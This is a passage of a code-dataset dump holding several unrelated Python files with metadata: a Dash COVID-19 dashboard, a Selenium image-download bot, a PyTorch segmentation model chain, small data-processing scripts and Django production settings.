i})\n#############################################################################\ntb= []\ntb.append({'label': 'Top', 'value': 'Top'})\ntb.append({'label': 'Bottom', 'value': 'Bottom'})\n#############################################################################\nlegend_pos= {'x': 0, 'y': 0.7, 'traceorder': 'normal'}\n############################################################################# \ndef form_bar(tb, sn):\n if tb=='Top':\n temp= df_a\n else:\n temp= df_d\n figb1= go.Figure(data= [go.Bar(x= temp.iloc[-sn:]['Confirmed'], y= temp.iloc[-sn:].index,\n orientation= 'h', width= 0.3, name= 'Confirmed',\n text= temp.iloc[-sn:]['Confirmed'], textposition='auto',\n marker= {'color': 'rgba(0, 
74, 140, 0.4)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}},\n ),\n go.Bar(x= temp.iloc[-sn:]['Recovery'], y= temp.iloc[-sn:].index,\n orientation= 'h', width= 0.4, name= 'Recovered',\n text= temp.iloc[-sn:]['Recovery'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 0.7)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}},\n ),\n go.Bar(x= temp.iloc[-sn:]['Death'], y= temp.iloc[-sn:].index,\n orientation= 'h', width= 0.5, name= 'Deceased',\n text= temp.iloc[-sn:]['Death'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 1)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}}),\n ],\n layout= go.Layout(yaxis= {'dtick': 1, 'showgrid': False}, paper_bgcolor='rgba(0,0,0,0)',\n barmode= 'stack', plot_bgcolor='rgba(0,0,0,0)', \n xaxis = {'showgrid': True, 'gridcolor': 'rgba(0, 74, 140, 0.5)'},\n ))\n figb1.update_layout(margin= dict(t=0, b=0, l=0, r=50), legend= dict(x= 0.5, y= 0.5, traceorder= 'normal'),\n legend_orientation=\"h\", height=350,)\n return figb1\n#fig.update_layout(barmode='stack')\n\n\n# In[31]:\n\n\n################################ Tab styling ################################\ntabs_style = {'height': '44px'}\ntab_style = {'padding': '8px', 'color': 'rgb(0, 74, 140)', 'fontFamily': 'Helvetica'}\ntab_selected_style = {\n 'borderTop': '2px solid #004a8c',\n 'borderBottom': '2px solid #004a8c',\n 'backgroundColor': 'rgba(0,74,140, 1)',\n 'color': 'rgb(255, 255, 255)',\n 'padding': '8px',\n 'fontWeight': 'bold',\n 'fontFamily': 'Helvetica',\n 'border-radius': '5px'\n}\n\n\n# In[32]:\n\n\ndf= df.replace('', 0)\ndf= df.astype(float)\n\n\n# In[33]:\n\n\ndf\n\n\n# In[ ]:\n\n\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP],\n meta_tags= [{'name': 'viewport',\n 'content': 'width=device-width, initial-scale=1'}])\napp.title = 'COVID-19@INDIA'\nserver= app.server\n##################################################################################\n##################################################################################\napp.layout= html.Div([\n \n html.Div([\n ##########################################################################\n ###################### temp header ######################\n ##########################################################################\n html.Div([\n html.H3(html.B(['COVID-19'], style= {'color': '#fff'})),\n dcc.Dropdown(id= 'state', options= states, clearable= False,\n value= states[n-1]['value'], optionHeight= 50),\n \n ], className='d-none d-sm-block', style= {'width': '16%', 'display': 'inline-block',\n 'text-align': 'left', 'color': '#000', 'padding-left': '2%'}),\n html.Div([\n html.H3(html.B('COVID-19@INDIA'))\n ], className= 'col-12 d-block d-sm-none', style= {'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n ##########################################################################\n html.Div([\n html.H3(html.B(id= 'cnfr')),\n html.H5('confirmed')\n ], className='col-md-2 col-6 d-block d-sm-none', style= {'display': 'inline-block',\n 'text-align': 'left', 'color': '#fff'}),\n html.Div([\n html.H3(html.B(id= 'cnfrm')),\n html.H5('confirmed')\n ], className='d-none d-sm-block', style= {'width': '11%', 'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n ##########################################################################\n html.Div([\n html.H3(html.B(r)),\n html.H5('recovered')\n ], className='col-md-2 col-6 d-block d-sm-none', style= {'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n html.Div([\n 
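# desktop-only recovered counter; the d-block d-sm-none sibling above serves mobile\n            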
html.H3(html.B(id= 'rcvr')),\n html.H5('recovered')\n ], className='d-none d-sm-block', style= {'width': '12%', 'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n ##########################################################################\n html.Div([\n html.H3(html.B(id= 'dth1')),\n html.H5('deceased')\n ], className='col-md-2 col-6 d-block d-sm-none', style= {'display': 'inline-block',\n 'text-align': 'left', 'color': '#fff'}),\n html.Div([\n html.H3(html.B(id= 'dth')),\n html.H5('deceased')\n ], className='d-none d-sm-block', style= {'width': '12%', 'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n ##########################################################################\n html.Div([\n html.H3(html.B(n)), \n html.H5('states')\n ], className='col-md-2 col-6 d-block d-sm-none', style= {'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n html.Div([\n html.H3(html.B(id= 'stts')), \n html.H5(id= 'stt')\n ], className='d-none d-sm-block', style= {'width': '8%', 'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n ########################################################################## \n html.Div([\n html.Div([\n dcc.Dropdown(id= 'helpdd1', options= hnames, clearable= False,\n value= hnames[0]['value'], )\n ], style= {'width': '45%', 'display': 'inline-block', 'padding-bottom': '2%',\n 'color': '#000'}),\n html.Div([ \n html.H3(html.B(id= 'hname1', className= 'd-none d-sm-block')),\n html.H6(updt),\n ], style= {'width': '55%', 'padding-left': '6%',\n 'display': 'inline-block', 'text-align': 'left'})\n ], className='d-none d-sm-block', style= {'width': '40%', 'display': 'inline-block', 'padding-left': '2%',\n 'text-align': 'left', 'color': '#fff'}),\n html.Div([\n html.Div([dcc.Dropdown(id= 'helpdd2', options= hnames, \n value= hnames[0]['value'], clearable= False)],\n className='col-6 d-block d-sm-none',\n style= {'display': 'flex', 'align-items': 'right',\n 'justify-content': 'right', 'display': 'inline-block'}),\n html.Div([html.H3(html.B(id= 'hname2'))], className='col-md-2 col-6 d-block d-sm-none',\n style= {'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}) \n ], className= 'row', style= {'padding-left': '5%', 'text-align': 'right', 'color': 'rgb(0, 74, 140)'}),\n ], className= 'navbar navbar-dark',\n style= {'padding-left': '3%', 'width': '100%', 'padding-top': '1%',\n 'background': 'rgb(0, 74, 140)'}), \n ########################## Header ends here ##########################\n html.Div([\n html.Div([\n \n dcc.Tabs(value='tab3', children=[ \n \n dcc.Tab(label= 'stats', value= 'tab3', children= [\n html.Div([\n html.Iframe(id= 'smap', height= '420', width= '100%',\n style= {'border': 'None'})\n ], style= {'width': '43%', 'display': 'inline-block',\n 'padding-top': '1%'}),\n html.Div([], style= {'width': '2%', 'display': 'inline-block',\n 'padding-top': '1%'}),\n html.Div([ \n html.Div([\n html.Div([\n html.H2(html.B(id= 'pop'), style= {}),\n html.H6('population')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'cp'), style= {}),\n html.H6('confirmed %')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n html.Div(style= 
{'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'rp'), style= {}),\n html.H6('recovered %')\n ], className= 'rounded-lg',\n style= {'width': '24%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'dp')),\n html.H6('death %')\n ], className= 'rounded-lg',\n style= {'width': '23%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n html.Div(style= {'width': '1%', 'display': 'inline-block'}), \n ], style= {'width': '100%'}),\n \n html.Div([\n html.Div([\n html.H2(html.B(id= 'tes')),\n html.H6('total tested')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'neg')),\n html.H6('tested negative')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'pos')),\n html.H6('tested positive')\n ], className= 'rounded-lg',\n style= {'width': '24%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'uncn')),\n html.H6('unconfirmed')\n ], className= 'rounded-lg',\n style= {'width': '23%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n \n ], style= {'width': '100%',}),\n \n html.Div([\n \n html.Div([\n html.H2(html.B('19023')),\n html.H6('ventilators')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(tnidf.tail(1)['Total Samples Tested'])),\n html.H6('samples tested')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n html.Div(style= {'width': '1%', 'display': 'inline-block'}), \n html.Div([\n html.H2(html.B(id= 'tpr')),\n html.H6('positivity rate')\n ], className= 'rounded-lg',\n style= {'width': '24%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'tpt')),\n html.H6('tests per 1000')\n ], className= 'rounded-lg',\n style= {'width': '23%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n \n \n \n ], style= {'width': '100%', 'padding-top': '4%'}), \n html.Div([\n html.Div([\n html.H3(html.B('central helpline: +91-11-23978046'))\n ], style= {'width': '100%', 'display': 'inline-block',\n 'text-align': 'right',}),\n html.Div([\n html.H3(html.B('email helpline: ncov2019@gov.in'))\n ], style= 
{'width': '100%', 'display': 'inline-block',\n 'text-align': 'right',}),\n html.Div([\n html.H3(html.B('state helpline: 104'))\n ], style= {'width': '100%', 'display': 'inline-block',\n 'text-align': 'right',}),\n ], style= {'width': '100%', 'padding-top': '3%'})\n \n ], style= {'width': '55%', 'display': 'inline-block', 'align': 'justify',\n 'padding-top': '1%', 'color': 'rgb(0, 74, 140)'}) \n ], style=tab_style, selected_style=tab_selected_style),\n \n \n \n dcc.Tab(label='figures', value='tab1', children= [\n html.Div([\n html.Div([\n html.Div([\n html.Div([ \n dcc.Dropdown(id= 'tb', options= tb, value= 'Top',\n clearable= False, style= {'width': '100%'})\n ], style= {'display': 'inline-block'}),\n html.Div([\n dcc.Dropdown(id= 'sn', options= nos, value= 3,\n clearable= False, )\n ], style= {'display': 'inline-block'})\n ], style= {'display': 'inline-block', 'padding-left': '10%'}), \n html.Div([html.H4('states affected',\n style= {'padding-bottom': '3%', 'color': 'rgb(0, 74, 140)'})],\n style= {'display': 'inline-block', 'padding-left': '3%'})\n ], style= {'padding-left': '25%'}),\n dcc.Graph(id= 'Bar1', config= {'displayModeBar': False})\n ], style= {'padding-top': '1%', 'width': '100%', \n 'padding-left': '5%'},)\n ], style=tab_style, selected_style=tab_selected_style),\n \n \n \n dcc.Tab(label='trends', value='tab2', children= [\n html.Div([\n html.Div([\n html.Div([ \n html.Div([html.H4('epidemic curve between',\n style= {'color': 'rgb(0, 74, 140)'})],\n style= {'display': 'inline-block',\n 'padding-left': '3%'}),\n html.Div([ \n dcc.Dropdown(id= 'dt1', options= dates,\n value= dates[0]['value'], clearable= False)\n ], style= {'display': 'inline-block', 'padding-left': '2%',\n 'width': '15%'}),\n html.Div([html.H4('and',\n style= {'padding-bottom': '2%',\n 'color': 'rgb(0, 74, 140)'})],\n style= {'display': 'inline-block',\n 'padding-left': '2%'}),\n \n html.Div([\n dcc.Dropdown(id= 'dt2', options= dates,\n value= dates[-1]['value'], clearable= False)\n ], style= {'display': 'inline-block', 'padding-left': '2%',\n 'width': '15%'}),\n \n html.Div([html.H4('(cumulative',\n style= {'padding-bottom': '2%', 'padding-top': '2%',\n 'color': 'rgb(0, 74, 140)'})],\n style= {'display': 'inline-block',\n 'padding-left': '3%'}),\n \n html.Div([\n daq.ToggleSwitch(id= 'ts', value= False, \n color=\"rgb(0, 74, 140)\", size= 40)\n ], style= {'display': 'inline-block', 'padding-left': '2%',\n }),\n \n html.Div([html.H4('daily)',\n style= {'padding-bottom': '2%',\n 'color': 'rgb(0, 74, 140)'})],\n style= {'display': 'inline-block',\n 'padding-left': '2%'}),\n ]), \n ], style= {'padding-left': '3%', }),\n dcc.Graph(id= 'Line1', config= {'displayModeBar': False})\n ], style= {'padding-top': '1%', 'width': '100%', 'padding-left': '3%'}, )\n ], style=tab_style, selected_style=tab_selected_style),\n \n ], style= tabs_style,\n colors={ 'border': 'rgba(0, 74, 140, 0)', 'primary': 'rgba(0, 74, 140, 1)',\n \"background\": \"rgba(0,0,0,0)\"},),\n ]), \n ], style= {'width': '95%', 'padding-left': '5%', 'padding-top': '02%'}) \n], style= {'fontFamily': 'Helvetica', 'height': '100v', 'padding-bottom': '5%',\n 'background': 'linear-gradient(to bottom, rgba(99, 212, 230, 0) 0%, rgba(99, 212, 230, 1) 100%)'})\n##################################################################################\n@app.callback(Output('cnfrm', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return df.loc[val]['Confirmed']\n##########################################\n@app.callback(Output('cp', 'children'),\n 
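# NOTE (editor): the callbacks below all reuse the name get_confirm; Dash binds each at decoration time, so the shadowing is harmless, but distinct names would be clearer\n              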
[Input('state', 'value')])\ndef get_confirm(val):\n return round((df.loc[val]['Confirmed']/stndd.loc[val]['Population NCP 2019 Projection'])*100, 5)\n##########################################\n@app.callback(Output('rp', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return round((df.loc[val]['Recovery']/df.loc[val]['Confirmed'])*100, 2)\n##########################################\n@app.callback(Output('rcvr', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return df.loc[val]['Recovery']\n##########################################\n@app.callback(Output('dp', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return round((df.loc[val]['Death']/df.loc[val]['Confirmed'])*100, 2)\n##########################################\n@app.callback(Output('dth', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return df.loc[val]['Death']\n##########################################\n##########################################\n@app.callback(Output('tes', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return stndd.loc[val]['Total Tested']\n##########################################\n@app.callback(Output('pos', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return stndd.loc[val]['Positive']\n##########################################\n@app.callback(Output('neg', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return stndd.loc[val]['Negative']\n##########################################\n@app.callback(Output('uncn', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return stndd.loc[val]['Unconfirmed']\n##########################################\n@app.callback(Output('pop', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n p= round(stndd.loc[val]['Population NCP 2019 Projection']/1000000000, 3)\n p= str(p) + 'b'\n return p\n##########################################\n##########################################\n@app.callback(Output('tpr', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return stndd.loc[val]['Test positivity rate']\n##########################################\n##########################################\n@app.callback(Output('tpt', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return round(stndd.loc[val]['Tests per thousand'], 2)\n##########################################\n@app.callback(Output('stts', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n if val=='India':\n return n\n pos= '#' + str(df_d.index.get_loc(val) + 1)\n return pos\n##########################################\n@app.callback(Output('stt', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n if val=='India':\n return 'states'\n return 'state'\n##########################################\n##########################################\n@app.callback(Output('hname1', 'children'),\n [Input('helpdd1', 'value')])\ndef update_hname(val):\n for i in range(len(hphone)):\n if hphone[i]['label']==val:\n return hphone[i]['value'] \n########################################## \n@app.callback(Output('hname2', 'children'),\n [Input('helpdd2', 'value')])\ndef update_hname(val):\n for i in range(len(hphone)):\n if hphone[i]['label']==val:\n return hphone[i]['value'] \n##########################################\n#@app.callback(Output('hmail', 'children'),\n# [Input('helpdd1', 'value')])\n#def update_hmail(val):\n# for i in range(len(hloc)):\n# if hloc[i]['label']==val:\n# return hloc[i]['value'] 
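\n# Editor's note (sketch, not in the original): render_smap below returns\n# open(state).read() without closing the file; a context-manager variant:\n#   def render_smap(state):\n#       with open('states/' + state + '.html') as fh:\n#           return fh.read()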
\n##########################################\n@app.callback(Output('smap', 'srcDoc'),\n [Input('state', 'value')])\ndef render_smap(state):\n state= 'states/'+state+'.html'\n return open(state, 'r').read()\n##########################################\n@app.callback(Output('Bar1', 'figure'),\n [Input('tb', 'value'), Input('sn', 'value')])\ndef update_bar(tb, sn):\n return form_bar(tb, sn)\n##########################################\n@app.callback(Output('Line1', 'figure'),\n [Input('dt1', 'value'), Input('dt2', 'value'), Input('ts', 'value')])\ndef update_bar(dt1, dt2, ts):\n if (ts):\n return get_dts(dt1, dt2)\n return get_cts(dt1, dt2)\n##################################################################################\nif __name__=='__main__':\n app.run_server()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":36448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614266819","text":"from time import sleep\nfrom urllib.error import HTTPError\nfrom urllib.request import urlretrieve\n\nimport pandas as pd\nfrom openpyxl import load_workbook\nfrom selenium import webdriver\n\n\ndef add_data_to_excel(d_images, cell_letters, is_photo):\n try:\n for cell_letter in cell_letters:\n if is_photo:\n key = 'Image {column_image_number}'.format(column_image_number = cell_letters.index(cell_letter) + 1)\n else:\n key = 'Image {column_image_number} Link'.format(\n column_image_number = cell_letters.index(cell_letter) + 1)\n\n column_rows = d_images[key]\n\n df_new = pd.DataFrame.from_records({key: column_rows})\n\n wb = load_workbook('table.xlsx')\n\n ws = wb['Sheet1']\n\n for cell_row_number, row in df_new.iterrows():\n cell = '%(column_letter)s%(cell_row_number)s' % dict(column_letter = cell_letter,\n cell_row_number = cell_row_number + 2)\n ws[cell] = row[0]\n\n wb.save('table.xlsx')\n except:\n print('WARNING!! Data NOT written to Excel. 
Make sure you keep your workbook CLOSED!')\n\n\nclass GoogleBot:\n def __init__(self, query, file_base, delay, number_of_images, down_images, main_index, link_i):\n # Activating the Chrome Driver\n self.link_index = link_i\n self.filename = ''\n self.driver = webdriver.Chrome()\n url = 'https://www.google.com/search?q={q}'.format(q = query)\n\n # Navigating to the Google Search for particular product\n self.driver.get(url)\n\n # Navigating to the Google Images tab\n self.driver.find_element_by_xpath(\n '//*[@id=\"hdtb-msb-vis\"]/div[2]/a') \\\n .click()\n\n sleep(delay)\n\n self.thumbnails_xpath = []\n\n # Adding the x paths of the thumbnails to the list\n for ind in range(number_of_images):\n self.thumbnails_xpath.append(\n '//*[@id=\"islrg\"]/div[1]/div[{index}]/a[1]/div[1]/img'.format(index = ind + 1))\n\n self.larger_image_xpath = '//*[@id=\"Sva75c\"]/div/div/div[3]/div[2]/div/div[1]/div[1]/div/div[2]/a/img'\n\n # Downloading the images\n for idx in range(number_of_images):\n self.image_download(delay = delay, file_base = file_base, query = query,\n thumbnail = self.thumbnails_xpath[idx],\n image = self.larger_image_xpath,\n image_index = idx + 1,\n d_load_images = down_images,\n m_index = main_index)\n photo_cells = ['B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J']\n add_data_to_excel(d_images = down_images, cell_letters = photo_cells, is_photo = True)\n \n self.driver.close()\n\n def image_download(self, delay, file_base, query, thumbnail, image, image_index, d_load_images, m_index,\n lnk_index):\n\n def excel_add_data_when_no_error():\n key = 'Image %(column_image_number)s' % dict(column_image_number = image_index)\n d_load_images[key].insert(m_index, self.filename)\n\n def excel_add_na_when_error():\n key_err = 'Image %(column_image_number)s' % dict(column_image_number = image_index)\n d_load_images[key_err].insert(m_index, 'n/a')\n\n try:\n # Navigating to the 1st thumbnail of the search and CLICKing in it\n self.driver.find_element_by_xpath(thumbnail) \\\n .click()\n sleep(delay)\n\n # Finding the larger image and assigning its tag to the img variable\n img = self.driver.find_element_by_xpath(image)\n\n # Getting the URL out the img attribute\n src = img.get_attribute('src')\n\n self.filename = file_base + '{image_index}.jpg'.format(image_index = image_index)\n\n # Downloading the (bigger) image and storing it locally\n urlretrieve(src, self.filename)\n except FileNotFoundError as err:\n excel_add_na_when_error()\n print(err) # something wrong with local path\n except HTTPError as err:\n excel_add_na_when_error()\n except:\n excel_add_na_when_error()\n\n # something unexpected went wrong\n print(\n 'Unknown Error Image {image_index} - {q}'.format(q = query, image_index = image_index))\n\n else:\n print(lnk_index)\n # Adding filename to download_images to be saved in Excel\n excel_add_data_when_no_error()\n # Letting the user know that the 1st image of the first product has been downloaded\n print('{q} - {filename} downloaded'.format(q = query, filename = self.filename))\n\n\nprint('========================================================================')\nprint('| Google_Bot 1.0.1.4 by Allex Radu [www.ATFR.net] |')\nprint('| Get the latest version at https://github.com/allexradu/gBot |')\nprint('========================================================================')\nprint('| Instructions: Save your Excel Workbook as \"a.xls\" and place it in |')\nprint('| the same folder as this file, make sure the file in not opened. 
|')\nprint('========================================================================')\nprint('| WARNING!!! WRITE THIS DOWN! To stop the bot press CTRL + C |')\nprint('========================================================================')\n\nno_of_images = 0\n\nlink_index = 0\n\ndownloaded_images = {'Image 1': [''], 'Image 2': [''], 'Image 3': [''], 'Image 4': [''],\n 'Image 5': [''], 'Image 6': [''], 'Image 7': [''], 'Image 8': [''], 'Image 9': [''],\n 'Image 1 Link': [], 'Image 2 Link': [], 'Image 3 Link': [], 'Image 4 Link': [], 'Image 5 Link': [],\n 'Image 6 Link': [], 'Image 7 Link': [], 'Image 8 Link': [], 'Image 9 Link': []}\n\nwhile True:\n try:\n no_of_images = int(input('Number of images per product [1-9]: '))\n except:\n print('Invalid Input!!! Try again!')\n else:\n if not (0 < no_of_images <= 9):\n print('Number not in range, try again!!')\n continue\n else:\n break\n\nwhile True:\n try:\n seconds_delay = float(input('Number of seconds delay from one image to another: ' +\n '\\n (the slower the computer / connection the higher the number)' +\n '\\n [Minimum 1 sec recommended] seconds: '))\n except:\n print('Invalid Input!!! Try again!')\n else:\n break\n\n# Reading first column of a local excel file\ntry:\n df = pd.read_excel('a.xls', sheet_name = 0)\n print('Excel Read Complete!')\n\n product_names = df['Name'].tolist()\n\n for i in range(len(product_names)):\n print(product_names[i])\n\n # Placing all the product names in a list\n\n for i in range(len(product_names)):\n if i == 0:\n link_index = 2\n else:\n link_index = i + 1\n file_name_base = 'A' + '{num}'.format(num = (100 + i))\n product_name = product_names[i]\n GoogleBot(product_name, file_name_base, seconds_delay, no_of_images, downloaded_images, i, link_index)\nexcept:\n print('Excel File NOT READ. 
Name your file \"a.xls\" with the first column \"Name\"')\n print('and place it in the same directory and the bot file.')\n","sub_path":"scrach/bk.py","file_name":"bk.py","file_ext":"py","file_size_in_byte":7543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439864320","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport torch\nfrom mlreco.models.uresnet_lonely import UResNet, SegmentationLoss\nfrom mlreco.models.ppn import PPN, PPNLoss\n\n\nclass Chain(torch.nn.Module):\n \"\"\"\n Run UResNet and use its encoding/decoding feature maps for PPN layers\n \"\"\"\n def __init__(self, model_config):\n super(Chain, self).__init__()\n self.ppn = PPN(model_config)\n self.uresnet_lonely = UResNet(model_config)\n\n def forward(self, input):\n point_cloud, label = input\n x = self.uresnet_lonely((point_cloud,))\n y = self.ppn((label, x[0][0], x[1][0], x[2][0]))\n return [x[0]] + y\n\n\nclass ChainLoss(torch.nn.modules.loss._Loss):\n \"\"\"\n Loss for UResNet + PPN chain\n \"\"\"\n def __init__(self, cfg):\n super(ChainLoss, self).__init__()\n self.uresnet_loss = SegmentationLoss(cfg)\n self.ppn_loss = PPNLoss(cfg)\n\n def forward(self, segmentation, label, particles):\n uresnet_res = self.uresnet_loss([segmentation[0]], label)\n ppn_res = self.ppn_loss(segmentation[1:], label, particles)\n res = { **ppn_res, **uresnet_res }\n res['uresnet_acc'] = uresnet_res['accuracy']\n res['uresnet_loss'] = uresnet_res['loss_seg']\n # Don't forget to sum all losses\n res['loss_seg'] = ppn_res['loss_ppn1'].float() + ppn_res['loss_ppn2'].float() + \\\n ppn_res['loss_class'].float() + ppn_res['loss_distance'].float() \\\n + uresnet_res['loss_seg'].float()\n return res\n","sub_path":"mlreco/models/uresnet_ppn_chain.py","file_name":"uresnet_ppn_chain.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"423900598","text":"# PROJECT 02 - PART A\n\n# This program is the work product of Group 11 BSE 1\n# GROUP 11 MEMBERS\n# 1. NIWAGABA CLEVER 2020/BSE/055/PS\n# 2. AINEBYONA ALBERT 2020/BSE/003/PS\n# 3. 
LEMI MANOAH JUNGO 2020/BSE/145/PS\n\ntry:\n # The program will always read from measles.txt\n file_handle = open('measles.txt')\n print(file_handle)\n\n # Program prompts the user for name of output file\n output_file = input(\"Enter name of output file: \")\n file_out = open(output_file, 'w')\n\n # Program prompts the user for the year\n year = input(\"Enter a year: \").lower()\n if len(year) > 4:\n print(\"Invalid entry for year\")\n quit()\n\n for line in file_handle:\n\n # Checking whether the year input is in the Year Field\n pyear = len(line)\n if year in line[pyear-5:]:\n file_out.write(line)\n elif year == 'all' or year == ' ':\n file_out.write(line)\n print(\"Check your output file: \", output_file)\n\nexcept:\n # If program is unable to open measles.txt file\n print(\"Unable to open specified file!!!\")\n quit()\n","sub_path":"src/project02/Project2_a.py","file_name":"Project2_a.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"52247830","text":"from .common import *\nimport django_heroku\nimport dj_database_url\n\nDEBUG = False\n\nALLOWED_HOSTS += [\n 'tutorportal.herokuapp.com',\n '127.0.0.1',\n]\n\nCORS_ORIGIN_WHITELIST = [\n 'https://tutorportal-web.herokuapp.com',\n]\n\nFRONTEND_POINT = {\n 'PROTOCOL': 'https',\n 'DOMAIN': 'tutorportal-web.herokuapp.com',\n}\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'name',\n 'USER': 'user',\n 'PASSWORD': '',\n 'HOST': 'host',\n 'PORT': '',\n }\n}\n\nFRONTEND_URL = '%s://%s' % (FRONTEND_POINT['PROTOCOL'], FRONTEND_POINT['DOMAIN'])\ndb_from_env = dj_database_url.config(conn_max_age=600, ssl_require=True)\nDATABASES['default'].update(db_from_env)\n\ndjango_heroku.settings(locals())\n","sub_path":"backend/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154842803","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 22 09:46:38 2016\n\n@author: hyl\n\n@version: 0.1\n\n@since: python2.7.6\n\"\"\"\n\ndef SortByKey(dict):\n \"\"\"\n sort a dictionary by keys\n \"\"\"\n keys = dict.keys() # get the keys\n keys.sort() # sort keys\n return map(dict.get, keys)\n\nif __name__ == \"__main__\":\n inf = open(\"../original_data/User_Properties.txt\") # read user information file\n outf = open(\"../temporary_data/User_Properties_sorted.txt\", \"w\") # store the information after sort\n inputInfor = {} # store the read-in data\n\n for line in inf.readlines():\n perItem = line.split() # split every line by space\n inputInfor[perItem[0]] = perItem # get the dictionary of id(string) to infor(tuple)\n \n res = SortByKey(inputInfor) # get the sorted data in tuple\n \n for item in res:\n outf.write('\\t'.join(item) + '\\n') # output to the file\n \n outf.close()\n inf.close()","sub_path":"userID_sort.py","file_name":"userID_sort.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"549008362","text":"from contextlib import ExitStack\n\n\ndef eval_pdf(model, x, params):\n \"\"\" Compute pdf of model at a given point x and for given parameters values \"\"\"\n\n def _pdf(model, x):\n if model.is_extended:\n return model.pdf(x) * model.get_yield()\n else:\n return model.pdf(x)\n\n if \"zfit\" in str(model.__class__):\n import zfit\n pdf = lambda m, x: zfit.run(_pdf(m, x))\n else:\n 
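# non-zfit models return plain values from pdf()/get_yield(), so the raw closure works as-is\n        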
